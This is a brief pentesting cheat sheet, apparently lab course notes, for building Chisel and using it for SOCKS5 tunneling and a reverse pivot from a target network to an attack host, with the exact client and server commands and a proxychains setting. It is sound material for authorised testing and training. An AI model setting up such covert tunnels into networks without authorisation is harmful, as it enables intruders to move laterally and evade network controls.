Chisel
Setting up Chisel
$ git clone https://github.com/jpillora/chisel.git
$ cd chisel
$ go build
SOCKS5 Tunneling with Chisel
Running Chisel on Pivot Host
$ ./chisel server -v -p 1234 --socks5
Connecting to the Chisel Server
$ ./chisel client -v 10.129.202.64:1234 socks
proxychains.conf
socks5 127.0.0.1 1080
Reverse Pivot with Chisel
Running Chisel on our Attack Host
$ sudo ./chisel server --reverse -v -p 1234 --socks5
Connecting to the Chisel Server
$ ./chisel client -v 10.10.14.17:1234 R:socks
Last updated